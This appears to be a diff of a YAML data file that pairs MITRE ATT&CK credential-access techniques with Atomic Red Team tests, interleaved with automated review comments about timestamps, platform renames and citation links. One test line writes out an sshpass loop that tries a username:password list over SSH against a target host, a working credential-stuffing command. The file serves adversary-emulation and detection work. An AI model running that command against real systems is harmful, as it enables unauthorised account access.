+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests:
- name: Search Through Bash History
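Review bot: for T1552.003 the whole head of the object (platforms, domains, id, created, external_references) is deleted in the previous hunk and re-added here after `x_mitre_data_sources`, which buries the substantive changes: the slideshare reference moves from `http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way` to `https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418` with a new retrieval date, `x_mitre_permissions_required` is dropped, and `revoked: false` and `x_mitre_deprecated: false` are added. A stable key order in the generator would turn this move into a few-line diff; as it stands a reviewer has to line up two hunks by hand to see what actually changed.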
@@ -51387,7 +52145,7 @@ credential-access:
name: sh
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -51461,7 +52219,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests:
- name: Find AWS credentials
@@ -51592,11 +52349,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
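Review bot: the unnamed technique block that closes just before `T1528:` loses `spec_version: '2.1'` but keeps `x_mitre_attack_spec_version: 3.1.0`, whereas every object that receives a fresh `modified` timestamp is bumped to 3.2.0; if removing `spec_version` is tied to the move to spec 3.2.0, this object (and the one that closes just before `T1606:` later in the patch) is left half-migrated. Either bump both or record that unmodified objects intentionally keep their old attack spec version.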
@@ -51645,6 +52401,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -51653,6 +52410,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -51663,13 +52421,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
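Review bot: for T1528 the `+ - IaaS` line is a net-new platform, not part of the Office 365 / Azure AD / Google Workspace to Office Suite / Identity Provider rename that the rest of the hunk performs; it widens the technique's scope and is the substantive reason for the 1.3 to 1.4 bump, so it deserves a mention in the commit message rather than being buried among rename lines.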
@@ -51725,44 +52484,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -51779,25 +52505,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
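Review bot: `modified` for T1556.008 goes backwards in this hunk, from `2023-10-31T14:00:00.188Z` to `2023-05-04T18:02:51.318Z`, the second such regression in the patch (T1558.001 is the other); check the source bundle before merging. The rest of the hunk is T1552.006 re-emitted with its keys in a new order: the four external_references are the same entries reshuffled, `x_mitre_permissions_required` (User) is dropped, and `revoked: false` plus `x_mitre_deprecated: false` are added, which is all that actually changes.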
@@ -51872,11 +52627,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -51920,11 +52674,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -51948,8 +52701,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
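Review bot: the `GitHub AWS-ADFS-Credential-Generator` reference changes repository owner, from `https://github.com/damianh/aws-adfs-credential-generator` to `https://github.com/pvanbuijtene/aws-adfs-credential-generator`, while the description still credits Damian Hickey (2017, January 28); confirm the new location is a fork or mirror of the same project rather than a different codebase, otherwise the citation attributes one author's work to another's repository. Updating the retrieval date to September 27, 2024 is consistent with a re-verified link.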
@@ -51965,11 +52718,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -51980,11 +52732,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -51994,16 +52748,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -52041,13 +52795,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -52056,6 +52807,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -52063,11 +52815,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -52085,13 +52837,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -52104,6 +52853,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -52117,12 +52867,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -52154,17 +52905,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
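Review bot: the Microsoft Midnight Blizzard reference swaps `https://twitter.com/MsftSecIntel/status/1671579359994343425` for `https://x.com/MsftSecIntel/status/1671579359994343425`, keeping the status id, so it is the same post and only the host and retrieval date change. The `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines removed at the bottom of T1212 in this hunk are the ones added near the top of the object in the two preceding T1212 hunks, so that pair is a move rather than a deletion.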
@@ -52237,7 +52985,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -52270,7 +53017,7 @@ credential-access:
name: bash
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -52279,6 +53026,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -52297,18 +53045,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -52332,13 +53080,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -52364,6 +53109,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -52375,18 +53121,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -52405,9 +53151,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests:
- name: SSH Credential Stuffing From MacOS
@@ -52443,7 +53186,7 @@ credential-access:
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -52472,24 +53215,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -52524,13 +53269,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -52608,14 +53350,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -52631,6 +53372,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -52639,13 +53381,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -52653,15 +53395,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -52672,9 +53410,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -52720,7 +53457,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
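Review bot: `modified` for ARP Cache Poisoning moves backwards, from `'2022-11-08T14:00:00.188Z'` to `'2022-07-22T18:37:22.176Z'`, and the object is otherwise untouched (it keeps `x_mitre_attack_spec_version: 2.1.0` in the following hunk and gains none of the `revoked`/`x_mitre_deprecated` keys its neighbours get). Note that several of the removed `modified` values in this patch share the identical time-of-day `14:00:00.188Z`, which looks like a batch-applied timestamp rather than the upstream object's own, so the older value here may actually be the authoritative one. Either way, state it in the commit message; a reviewer reading only the diff sees a regression.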
@@ -52739,17 +53476,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -52782,10 +53518,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -52822,11 +53557,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -52894,34 +53628,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -52930,20 +53640,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
